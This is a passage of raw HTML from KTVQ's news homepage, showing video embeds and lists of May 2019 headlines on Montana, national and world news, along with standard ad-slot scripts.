elementor-section-height-default elementor-section elementor-top-section" data-element_type="section"> <div class="elementor-container elementor-column-gap-no"> <div class="elementor-row"> <div data-id="f0664eb" class="elementor-element elementor-element-f0664eb elementor-column elementor-col-100 elementor-top-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <section data-id="67d88dec" class="elementor-element elementor-element-67d88dec elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-inner-section" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div data-id="12152835" class="elementor-element elementor-element-12152835 elementor-column elementor-col-33 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="18774e76" class="elementor-element elementor-element-18774e76 elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default"><a href="https://ktvq.com/watch/">Watch</a></h2> </div> </div> </div> </div> </div> <div data-id="3ac99dc4" class="elementor-element elementor-element-3ac99dc4 elementor-column elementor-col-33 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="6063b1f" class="elementor-element elementor-element-6063b1f elementor-hidden-tablet elementor-hidden-phone elementor-widget elementor-widget-divider" data-element_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"></span> </div> </div> </div> </div> </div> </div> <div data-id="298623c6" class="elementor-element elementor-element-298623c6 elementor-column elementor-col-33 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="4333b0d0" class="elementor-element elementor-element-4333b0d0 elementor-button-danger elementor-align-center elementor-widget elementor-widget-button" data-element_type="button.default"> <div class="elementor-widget-container"> <div class="elementor-button-wrapper"> <a href="http://ktvq.com/live/" class="elementor-button-link elementor-button elementor-size-md elementor-animation-grow" role="button"> <span class="elementor-button-content-wrapper"> <span class="elementor-button-icon elementor-align-icon-left"> <i class="fa fa-video-camera" aria-hidden="true"></i> </span> <span class="elementor-button-text">Watch KTVQ Newscasts</span> </span> </a> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section data-id="180c6c4b" class="elementor-element elementor-element-180c6c4b elementor-section-full_width elementor-section-height-default elementor-section-height-default elementor-section elementor-inner-section" data-element_type="section"> <div class="elementor-container elementor-column-gap-extended"> <div class="elementor-row"> <div data-id="75e9735c" class="elementor-element elementor-element-75e9735c elementor-column elementor-col-50 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="b80cac6" class="elementor-element elementor-element-b80cac6 elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h5 class="elementor-heading-title elementor-size-default">Latest Videos</h5> </div> </div> <div data-id="d099dd4" class="elementor-element elementor-element-d099dd4 elementor-widget elementor-widget-text-editor" data-element_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><p><div class="embed"><div class="embed"><iframe id="_ytid_86952" width="480" height="270" src="https://www.youtube.com/embed/?enablejsapi=1&#038;listType=playlist&#038;list=UUN2IWwjVxh4vOnMbnjiM8Hw&#038;autoplay=0&#038;cc_load_policy=0&#038;iv_load_policy=1&#038;loop=0&#038;modestbranding=0&#038;rel=1&#038;showinfo=1&#038;fs=1&#038;playsinline=0&#038;controls=2&#038;autohide=2&#038;theme=dark&#038;color=red&#038;" class="__youtube_prefs__ __youtube_prefs_widget__" title="YouTube player" allowfullscreen data-no-lazy="1" data-skipgform_ajax_framebjll=""></iframe></div></div></p></div> </div> </div> </div> </div> </div> <div data-id="6855afc7" class="elementor-element elementor-element-6855afc7 elementor-column elementor-col-50 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="f89b079" class="elementor-element elementor-element-f89b079 elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h5 class="elementor-heading-title elementor-size-default">Newscasts</h5> </div> </div> <div data-id="bfb9d7a" class="elementor-element elementor-element-bfb9d7a elementor-widget elementor-widget-text-editor" data-element_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><p><div class="embed"><iframe width="500" height="281" src="https://www.youtube.com/embed/videoseries?list=PLEbjngvF2PwtI6VpraM6WItQmPKepfsiH" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe></div></p></div> </div> </div> <div data-id="3ac9118" class="elementor-element elementor-element-3ac9118 elementor-align-center elementor-widget elementor-widget-button" data-element_type="button.default"> <div class="elementor-widget-container"> <div class="elementor-button-wrapper"> <a href="/video/" class="elementor-button-link elementor-button elementor-size-sm" role="button"> <span class="elementor-button-content-wrapper"> <span class="elementor-button-text">Watch More Videos From KTVQ</span> </span> </a> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section data-id="46c969c9" class="elementor-element elementor-element-46c969c9 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-inner-section" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div data-id="52d3ee68" class="elementor-element elementor-element-52d3ee68 elementor-column elementor-col-50 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="673f8f70" class="elementor-element elementor-element-673f8f70 elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default"><a href="http://ktvq.com/on-ktvq/">On KTVQ</a></h2> </div> </div> </div> </div> </div> <div data-id="2115628f" class="elementor-element elementor-element-2115628f elementor-column elementor-col-50 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="314aac6b" class="elementor-element elementor-element-314aac6b elementor-hidden-tablet elementor-hidden-phone elementor-widget elementor-widget-divider" data-element_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"></span> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section data-id="3911ff7f" class="elementor-element elementor-element-3911ff7f elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-inner-section" data-element_type="section"> <div class="elementor-container elementor-column-gap-extended"> <div class="elementor-row"> <div data-id="651b4a02" class="elementor-element elementor-element-651b4a02 elementor-column elementor-col-25 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="325e672d" class="elementor-element elementor-element-325e672d elementor-widget elementor-widget-wp-widget-pojo_recent_posts" data-element_type="wp-widget-pojo_recent_posts.default"> <div class="elementor-widget-container"> <h5>Crime Watch</h5><div class="list-items"><div class="recent-post grid-item grid-one post-202442 post type-post status-publish format-standard has-post-thumbnail hentry category-crime-watch category-local-news category-news tag-billings tag-mcdonald tag-paswsages tag-pre-release "> <div class="item-inner"> <div class="entry-thumbnail"> <a href="https://ktvq.com/news/crime-watch/2019/05/16/woman-reported-as-walkaway-from-billings-pre-release-center/" title="Woman reported as walkaway from Billings pre-release center" rel="bookmark" class="image-link"> <img src="https://s3.amazonaws.com/cordillera-network/wp-content/uploads/sites/6/2019/05/16041451/kmc.jpg" alt="Woman reported as walkaway from Billings pre-release center" class="media-object" /> </a> </div> <div class="caption"> <h4 class="grid-heading entry-title"> <a href="https://ktvq.com/news/crime-watch/2019/05/16/woman-reported-as-walkaway-from-billings-pre-release-center/" title="Woman reported as walkaway from Billings pre-release center" rel="bookmark">Woman reported as walkaway from Billings pre-release center</a> </h4> <div class="entry-meta"> </div> </div> </div> </div></div> </div> </div> </div> </div> </div> <div data-id="24014a9f" class="elementor-element elementor-element-24014a9f elementor-column elementor-col-25 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="6e03b0ac" class="elementor-element elementor-element-6e03b0ac elementor-widget elementor-widget-wp-widget-pojo_recent_posts" data-element_type="wp-widget-pojo_recent_posts.default"> <div class="elementor-widget-container"> <h5>Montana Made</h5><div class="list-items"><div class="recent-post grid-item grid-one post-140608 post type-post status-publish format-standard has-post-thumbnail hentry category-montana-made category-montana-news category-news tag-adf tag-great-falls tag-montana tag-steel "> <div class="item-inner"> <div class="entry-thumbnail"> <a href="https://ktvq.com/news/montana-news/2019/02/04/montana-made-adf-international-inc/" title="Montana Made: ADF International, Inc." rel="bookmark" class="image-link"> <img src="https://s3.amazonaws.com/cordillera-network/wp-content/uploads/sites/6/2019/02/04101953/mtsteel.jpg" alt="Montana Made: ADF International, Inc." class="media-object" /> </a> </div> <div class="caption"> <h4 class="grid-heading entry-title"> <a href="https://ktvq.com/news/montana-news/2019/02/04/montana-made-adf-international-inc/" title="Montana Made: ADF International, Inc." rel="bookmark">Montana Made: ADF International, Inc.</a> </h4> <div class="entry-meta"> </div> </div> </div> </div></div> </div> </div> </div> </div> </div> <div data-id="1f0a332f" class="elementor-element elementor-element-1f0a332f elementor-column elementor-col-25 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="2d099260" class="elementor-element elementor-element-2d099260 elementor-widget elementor-widget-wp-widget-pojo_recent_posts" data-element_type="wp-widget-pojo_recent_posts.default"> <div class="elementor-widget-container"> <h5>Montana Ag Network</h5><div class="list-items"><div class="recent-post grid-item grid-one post-202537 post type-post status-publish format-standard has-post-thumbnail hentry category-montana-ag-network category-montana-news category-news tag-beef tag-may tag-montana-ag tag-month "> <div class="item-inner"> <div class="entry-thumbnail"> <a href="https://ktvq.com/news/montana-ag-network/2019/05/16/montana-ag-network-may-is-national-beef-month/" title="Montana Ag Network: May is National Beef Month" rel="bookmark" class="image-link"> <img src="https://s3.amazonaws.com/cordillera-network/wp-content/uploads/sites/6/2019/05/16065144/bmonth.jpg" alt="Montana Ag Network: May is National Beef Month" class="media-object" /> </a> </div> <div class="caption"> <h4 class="grid-heading entry-title"> <a href="https://ktvq.com/news/montana-ag-network/2019/05/16/montana-ag-network-may-is-national-beef-month/" title="Montana Ag Network: May is National Beef Month" rel="bookmark">Montana Ag Network: May is National Beef Month</a> </h4> <div class="entry-meta"> </div> </div> </div> </div></div> </div> </div> </div> </div> </div> <div data-id="1ecc3d17" class="elementor-element elementor-element-1ecc3d17 elementor-column elementor-col-25 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="b8e4249" class="elementor-element elementor-element-b8e4249 elementor-widget elementor-widget-wp-widget-ad_placement" data-element_type="wp-widget-ad_placement.default"> <div class="elementor-widget-container"> <div id="div-gpt-ad-13" class="div-gpt-ad div-gpt-widget"></div> <script> googletag.cmd.push(function () { googletag.display('div-gpt-ad-13'); }); </script> </div> </div> </div> </div> </div> </div> </div> </section> </div> </div> </div> </div> </div> </section> <section data-id="796ea50" class="elementor-element elementor-element-796ea50 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div data-id="c5a92e1" class="elementor-element elementor-element-c5a92e1 elementor-column elementor-col-33 elementor-top-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="7848f6e" class="elementor-element elementor-element-7848f6e elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default"><a href="https://ktvq.com/ktvq/category/news/trending/">Trending News</a></h2> </div> </div> </div> </div> </div> <div data-id="c5ccfff" class="elementor-element elementor-element-c5ccfff elementor-column elementor-col-66 elementor-top-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="1494375" class="elementor-element elementor-element-1494375 elementor-hidden-tablet elementor-hidden-phone elementor-widget elementor-widget-divider" data-element_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"></span> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section data-id="2fec324" class="elementor-element elementor-element-2fec324 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div data-id="c7fd523" class="elementor-element elementor-element-c7fd523 elementor-column elementor-col-33 elementor-top-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="9516733" class="elementor-element elementor-element-9516733 elementor-widget elementor-widget-wp-widget-ad_placement" data-element_type="wp-widget-ad_placement.default"> <div class="elementor-widget-container"> <div id="div-gpt-ad-7" class="div-gpt-ad div-gpt-widget"></div> <script> googletag.cmd.push(function () { googletag.display('div-gpt-ad-7'); }); </script> </div> </div> </div> </div> </div> <div data-id="01b1222" class="elementor-element elementor-element-01b1222 elementor-column elementor-col-33 elementor-top-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="4dfac02" class="elementor-element elementor-element-4dfac02 elementor-widget elementor-widget-wp-widget-pojo_recent_posts" data-element_type="wp-widget-pojo_recent_posts.default"> <div class="elementor-widget-container"> <div class="list-items"><div class="recent-post media list-item post-202561 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-trending tag-boy tag-found tag-kentucky "> <div class="media-left"> <a href="https://ktvq.com/news/trending/2019/05/16/video-extra-missing-almost-3-days-toddler-found-alive/" title="Video Extra: Missing almost 3 days, toddler found alive" rel="bookmark" class="image-link"> <img src="https://s3.amazonaws.com/cordillera-network/wp-content/uploads/sites/6/2019/05/16072032/bfound.jpg" alt="Video Extra: Missing almost 3 days, toddler found alive" class="media-object" /> </a> </div> <div class="media-body"> <h3 class="media-heading entry-title"><a href="https://ktvq.com/news/trending/2019/05/16/video-extra-missing-almost-3-days-toddler-found-alive/">Video Extra: Missing almost 3 days, toddler found alive</a></h3> <div class="entry-meta"> <span><time datetime="2019-05-16" class="entry-date date published updated">May 16, 2019</time></span> <span class="entry-time">7:24 am</span> </div> </div> </div><div class="recent-post media list-item post-202556 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-trending tag-bus tag-push "> <div class="media-left"> <a href="https://ktvq.com/news/trending/2019/05/16/las-vegas-woman-arrested-on-murder-charge-after-elderly-man-pushed-off-bus/" title="Las Vegas woman arrested on murder charge after elderly man pushed off bus" rel="bookmark" class="image-link"> <img src="https://s3.amazonaws.com/cordillera-network/wp-content/uploads/sites/6/2019/05/16070920/buspush1.jpg" alt="Las Vegas woman arrested on murder charge after elderly man pushed off bus" class="media-object" /> </a> </div> <div class="media-body"> <h3 class="media-heading entry-title"><a href="https://ktvq.com/news/trending/2019/05/16/las-vegas-woman-arrested-on-murder-charge-after-elderly-man-pushed-off-bus/">Las Vegas woman arrested on murder charge after elderly man pushed off bus</a></h3> <div class="entry-meta"> <span><time datetime="2019-05-16" class="entry-date date published updated">May 16, 2019</time></span> <span class="entry-time">7:13 am</span> </div> </div> </div><div class="recent-post media list-item post-202263 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-trending tag-democrats tag-iowa tag-new-york tag-president "> <div class="media-left"> <a href="https://ktvq.com/news/trending/2019/05/15/new-york-city-mayor-bill-de-blasio-to-announce-2020-presidential-run-2/" title="New York City Mayor Bill de Blasio to announce 2020 presidential run" rel="bookmark" class="image-link"> <img src="https://s3.amazonaws.com/cordillera-network/wp-content/uploads/sites/6/2019/05/15170616/S109214898.jpg" alt="New York City Mayor Bill de Blasio to announce 2020 presidential run" class="media-object" /> </a> </div> <div class="media-body"> <h3 class="media-heading entry-title"><a href="https://ktvq.com/news/trending/2019/05/15/new-york-city-mayor-bill-de-blasio-to-announce-2020-presidential-run-2/">New York City Mayor Bill de Blasio to announce 2020 presidential run</a></h3> <div class="entry-meta"> <span><time datetime="2019-05-15" class="entry-date date published updated">May 15, 2019</time></span> <span class="entry-time">5:06 pm</span> </div> </div> </div></div> </div> </div> </div> </div> </div> <div data-id="0a76b05" class="elementor-element elementor-element-0a76b05 elementor-column elementor-col-33 elementor-top-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="8355650" class="elementor-element elementor-element-8355650 elementor-widget elementor-widget-wp-widget-pojo_recent_posts" data-element_type="wp-widget-pojo_recent_posts.default"> <div class="elementor-widget-container"> <div class="list-items"><div class="recent-post media list-item post-201968 post type-post status-publish format-standard has-post-thumbnail hentry category-crime-watch category-news category-trending tag-alec-mckinney tag-colorado tag-devon-erickson tag-school tag-shooting tag-stem "> <div class="media-left"> <a href="https://ktvq.com/news/crime-watch/2019/05/15/colorado-school-shooting-suspect-facing-more-charges/" title="Colorado school shooting suspect facing more charges" rel="bookmark" class="image-link"> <img src="https://s3.amazonaws.com/cordillera-network/wp-content/uploads/sites/6/2019/05/15100118/devon.jpg" alt="Colorado school shooting suspect facing more charges" class="media-object" /> </a> </div> <div class="media-body"> <h3 class="media-heading entry-title"><a href="https://ktvq.com/news/crime-watch/2019/05/15/colorado-school-shooting-suspect-facing-more-charges/">Colorado school shooting suspect facing more charges</a></h3> <div class="entry-meta"> <span><time datetime="2019-05-15" class="entry-date date published updated">May 15, 2019</time></span> <span class="entry-time">10:12 am</span> </div> </div> </div></div> </div> </div> <div data-id="57ff6f9" class="elementor-element elementor-element-57ff6f9 elementor-widget elementor-widget-wp-widget-ad_placement" data-element_type="wp-widget-ad_placement.default"> <div class="elementor-widget-container"> <div id="div-gpt-ad-15" class="div-gpt-ad div-gpt-widget"></div> <script> googletag.cmd.push(function () { googletag.display('div-gpt-ad-15'); }); </script> </div> </div> </div> </div> </div> </div> </div> </section> <section data-id="4ba95a18" class="elementor-element elementor-element-4ba95a18 elementor-section-full_width elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-element_type="section"> <div class="elementor-container elementor-column-gap-no"> <div class="elementor-row"> <div data-id="53b6a80b" class="elementor-element elementor-element-53b6a80b elementor-column elementor-col-100 elementor-top-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="7ed87bd3" class="elementor-element elementor-element-7ed87bd3 elementor-hidden-tablet elementor-hidden-phone elementor-widget elementor-widget-divider" data-element_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"></span> </div> </div> </div> <section data-id="3b2275d2" class="elementor-element elementor-element-3b2275d2 elementor-section-full_width elementor-section-height-default elementor-section-height-default elementor-section elementor-inner-section" data-element_type="section"> <div class="elementor-container elementor-column-gap-extended"> <div class="elementor-row"> <div data-id="3e35285e" class="elementor-element elementor-element-3e35285e elementor-column elementor-col-25 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="40f699cd" class="elementor-element elementor-element-40f699cd elementor-widget elementor-widget-wp-widget-pojo_recent_posts" data-element_type="wp-widget-pojo_recent_posts.default"> <div class="elementor-widget-container"> <h5>Montana</h5><div class="list-items"><div class="recent-post media list-item post-202537 post type-post status-publish format-standard has-post-thumbnail hentry category-montana-ag-network category-montana-news category-news tag-beef tag-may tag-montana-ag tag-month "> <div class="media-body"> <h3 class="media-heading entry-title"><a href="https://ktvq.com/news/montana-ag-network/2019/05/16/montana-ag-network-may-is-national-beef-month/">Montana Ag Network: May is National Beef Month</a></h3> <div class="entry-meta"> <span><time datetime="2019-05-16" class="entry-date date published updated">May 16, 2019</time></span> <span class="entry-time">6:54 am</span> </div> </div> </div><div class="recent-post media list-item post-202527 post type-post status-publish format-standard has-post-thumbnail hentry category-montana-ag-network category-montana-news category-news tag-hunt tag-montana-ag tag-shed tag-sun-river "> <div class="media-body"> <h3 class="media-heading entry-title"><a href="https://ktvq.com/news/montana-ag-network/2019/05/16/montana-ag-network-shed-hunting-begins-near-augusta/">Montana Ag Network: Shed hunting begins near Augusta</a></h3> <div class="entry-meta"> <span><time datetime="2019-05-16" class="entry-date date published updated">May 16, 2019</time></span> <span class="entry-time">6:33 am</span> </div> </div> </div><div class="recent-post media list-item post-202495 post type-post status-publish format-standard has-post-thumbnail hentry category-montana-news category-news tag-4867 tag-games tag-great-falls tag-montana tag-special-olympics tag-summer "> <div class="media-body"> <h3 class="media-heading entry-title"><a href="https://ktvq.com/news/montana-news/2019/05/16/special-olympics-montana-kicks-off-summer-games-with-opening-ceremonies/">Special Olympics Montana kicks off summer games with Opening Ceremonies</a></h3> <div class="entry-meta"> <span><time datetime="2019-05-16" class="entry-date date published updated">May 16, 2019</time></span> <span class="entry-time">5:43 am</span> </div> </div> </div><div class="recent-post media list-item post-202472 post type-post status-publish format-standard has-post-thumbnail hentry category-montana-news category-news tag-crash tag-fatal tag-montana tag-west-glacier "> <div class="media-body"> <h3 class="media-heading entry-title"><a href="https://ktvq.com/news/montana-news/2019/05/16/2-women-killed-child-injured-in-crash-near-west-glacier/">2 women killed, child injured in crash near West Glacier</a></h3> <div class="entry-meta"> <span><time datetime="2019-05-16" class="entry-date date published updated">May 16, 2019</time></span> <span class="entry-time">4:52 am</span> </div> </div> </div><div class="recent-post media list-item post-202458 post type-post status-publish format-standard has-post-thumbnail hentry category-montana-news category-news tag-bullock tag-money tag-president tag-raised "> <div class="media-body"> <h3 class="media-heading entry-title"><a href="https://ktvq.com/news/montana-news/2019/05/16/bullock-campaign-says-1m-raised-in-first-24-hours/">Bullock campaign says $1M raised in first 24 hours</a></h3> <div class="entry-meta"> <span><time datetime="2019-05-16" class="entry-date date published updated">May 16, 2019</time></span> <span class="entry-time">4:31 am</span> </div> </div> </div><div class="recent-post media list-item post-202452 post type-post status-publish format-standard has-post-thumbnail hentry category-montana-news category-news tag-bison tag-dog tag-yellowstone-national-park "> <div class="media-body"> <h3 class="media-heading entry-title"><a href="https://ktvq.com/news/montana-news/2019/05/16/watch-small-dog-runs-around-bison-in-yellowstone-national-park/">WATCH: Small dog runs around bison in Yellowstone National Park</a></h3> <div class="entry-meta"> <span><time datetime="2019-05-16" class="entry-date date published updated">May 16, 2019</time></span> <span class="entry-time">4:25 am</span> </div> </div> </div></div> </div> </div> </div> </div> </div> <div data-id="20e32c82" class="elementor-element elementor-element-20e32c82 elementor-column elementor-col-25 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="3782642f" class="elementor-element elementor-element-3782642f elementor-widget elementor-widget-wp-widget-pojo_recent_posts" data-element_type="wp-widget-pojo_recent_posts.default"> <div class="elementor-widget-container"> <h5>Nation</h5><div class="list-items"><div class="recent-post media list-item post-202578 post type-post status-publish format-standard hentry category-cnn-us-politics "> <div class="media-body"> <h3 class="media-heading entry-title"><a href="https://ktvq.com/cnn-us-politics/2019/05/16/missouri-moves-a-step-closer-to-banning-abortion-after-eight-weeks-of-pregnancy/">Missouri moves a step closer to banning abortion after eight weeks of pregnancy</a></h3> <div class="entry-meta"> <span><time datetime="2019-05-16" class="entry-date date published updated">May 16, 2019</time></span> <span class="entry-time">7:38 am</span> </div> </div> </div><div class="recent-post media list-item post-202349 post type-post status-publish format-image has-post-thumbnail hentry category-cnn-us-politics post_format-post-format-image "> <div class="media-body"> <h3 class="media-heading entry-title"><a href="https://ktvq.com/cnn-us-politics/2019/05/16/maine-senate-passes-bill-giving-states-electoral-votes-to-national-popular-vote-winner/">Maine Senate passes bill giving state&#8217;s electoral votes to national popular vote winner</a></h3> <div class="entry-meta"> <span><time datetime="2019-05-16" class="entry-date date published updated">May 16, 2019</time></span> <span class="entry-time">7:28 am</span> </div> </div> </div><div class="recent-post media list-item post-202563 post type-post status-publish format-standard hentry category-cnn-us-politics "> <div class="media-body"> <h3 class="media-heading entry-title"><a href="https://ktvq.com/cnn-us-politics/2019/05/16/angus-king-says-he-believes-us-intelligence-on-iran-but-questions-cause-of-latest-standoff/">Angus King says he believes US intelligence on Iran but questions cause of latest standoff</a></h3> <div class="entry-meta"> <span><time datetime="2019-05-16" class="entry-date date published updated">May 16, 2019</time></span> <span class="entry-time">7:20 am</span> </div> </div> </div><div class="recent-post media list-item post-202383 post type-post status-publish format-image has-post-thumbnail hentry category-cnn-national post_format-post-format-image "> <div class="media-body"> <h3 class="media-heading entry-title"><a href="https://ktvq.com/cnn-national/2019/05/16/guatemalan-toddler-dies-in-us-custody-report-says/">Guatemalan toddler dies in US custody, report says</a></h3> <div class="entry-meta"> <span><time datetime="2019-05-16" class="entry-date date published updated">May 16, 2019</time></span> <span class="entry-time">7:17 am</span> </div> </div> </div><div class="recent-post media list-item post-202255 post type-post status-publish format-image has-post-thumbnail hentry category-cnn-us-politics post_format-post-format-image "> <div class="media-body"> <h3 class="media-heading entry-title"><a href="https://ktvq.com/cnn-us-politics/2019/05/16/new-york-city-mayor-bill-de-blasio-to-announce-2020-presidential-run/">New York City Mayor Bill de Blasio announces 2020 presidential run</a></h3> <div class="entry-meta"> <span><time datetime="2019-05-16" class="entry-date date published updated">May 16, 2019</time></span> <span class="entry-time">7:09 am</span> </div> </div> </div><div class="recent-post media list-item post-202446 post type-post status-publish format-image has-post-thumbnail hentry category-cnn-us-politics post_format-post-format-image "> <div class="media-body"> <h3 class="media-heading entry-title"><a href="https://ktvq.com/cnn-us-politics/2019/05/16/bullock-scores-endorsement-from-iowa-attorney-general/">Bullock scores endorsement from Iowa attorney general</a></h3> <div class="entry-meta"> <span><time datetime="2019-05-16" class="entry-date date published updated">May 16, 2019</time></span> <span class="entry-time">7:05 am</span> </div> </div> </div></div> </div> </div> </div> </div> </div> <div data-id="38b27911" class="elementor-element elementor-element-38b27911 elementor-column elementor-col-25 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="23302194" class="elementor-element elementor-element-23302194 elementor-widget elementor-widget-wp-widget-pojo_recent_posts" data-element_type="wp-widget-pojo_recent_posts.default"> <div class="elementor-widget-container"> <h5>World</h5><div class="list-items"><div class="recent-post media list-item post-202550 post type-post status-publish format-standard hentry category-cnn-europe-mideast-africa "> <div class="media-body"> <h3 class="media-heading entry-title"><a href="https://ktvq.com/cnn-europe-mideast-africa/2019/05/16/instability-spreading-in-west-antarctic-ice-sheet/">Instability spreading in West Antarctic ice sheet</a></h3> <div class="entry-meta"> <span><time datetime="2019-05-16" class="entry-date date published updated">May 16, 2019</time></span> <span class="entry-time">7:20 am</span> </div> </div> </div><div class="recent-post media list-item post-202523 post type-post status-publish format-standard hentry category-cnn-europe-mideast-africa "> <div class="media-body"> <h3 class="media-heading entry-title"><a href="https://ktvq.com/cnn-europe-mideast-africa/2019/05/16/prince-harry-accepts-substantial-damages-after-helicopter-photos-forced-royal-couple-from-their-home/">Prince Harry accepts &#8216;substantial&#8217; damages after helicopter photos forced royal couple from their home</a></h3> <div class="entry-meta"> <span><time datetime="2019-05-16" class="entry-date date published updated">May 16, 2019</time></span> <span class="entry-time">6:18 am</span> </div> </div> </div><div class="recent-post media list-item post-202440 post type-post status-publish format-image has-post-thumbnail hentry category-cnn-asia-pacific post_format-post-format-image "> <div class="media-body"> <h3 class="media-heading entry-title"><a href="https://ktvq.com/cnn-asia-pacific/2019/05/16/bob-hawke-former-australian-prime-minister-dead-at-89/">Bob Hawke, former Australian prime minister, dead at 89</a></h3> <div class="entry-meta"> <span><time datetime="2019-05-16" class="entry-date date published updated">May 16, 2019</time></span> <span class="entry-time">5:51 am</span> </div> </div> </div><div class="recent-post media list-item post-202401 post type-post status-publish format-image has-post-thumbnail hentry category-cnn-europe-mideast-africa post_format-post-format-image "> <div class="media-body"> <h3 class="media-heading entry-title"><a href="https://ktvq.com/cnn-europe-mideast-africa/2019/05/16/sex-vouchers-for-migrants-the-truth-behind-europes-fake-stories/">Sex vouchers for migrants? The truth behind Europe&#8217;s fake stories</a></h3> <div class="entry-meta"> <span><time datetime="2019-05-16" class="entry-date date published updated">May 16, 2019</time></span> <span class="entry-time">5:38 am</span> </div> </div> </div><div class="recent-post media list-item post-202485 post type-post status-publish format-standard hentry category-cnn-europe-mideast-africa "> <div class="media-body"> <h3 class="media-heading entry-title"><a href="https://ktvq.com/cnn-europe-mideast-africa/2019/05/16/eta-former-leader-josu-ternera-arrested-after-16-years-on-the-run/">ETA former leader Josu Ternera arrested after 16 years on the run</a></h3> <div class="entry-meta"> <span><time datetime="2019-05-16" class="entry-date date published updated">May 16, 2019</time></span> <span class="entry-time">5:09 am</span> </div> </div> </div><div class="recent-post media list-item post-202477 post type-post status-publish format-standard hentry category-cnn-europe-mideast-africa "> <div class="media-body"> <h3 class="media-heading entry-title"><a href="https://ktvq.com/cnn-europe-mideast-africa/2019/05/16/choco-leibniz-heiress-apologizes-for-defending-use-of-nazi-slave-labor/">Choco Leibniz heiress apologizes for defending use of Nazi slave labor</a></h3> <div class="entry-meta"> <span><time datetime="2019-05-16" class="entry-date date published updated">May 16, 2019</time></span> <span class="entry-time">4:59 am</span> </div> </div> </div></div> </div> </div> </div> </div> </div> <div data-id="522c8724" class="elementor-element elementor-element-522c8724 elementor-column elementor-col-25 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="984c9d6" class="elementor-element elementor-element-984c9d6 elementor-widget elementor-widget-wp-widget-ad_placement" data-element_type="wp-widget-ad_placement.default"> <div class="elementor-widget-container"> <div id="div-gpt-ad-9" class="div-gpt-ad div-gpt-widget"></div> <script> googletag.cmd.push(function () { googletag.display('div-gpt-ad-9'); }); </script> </div> 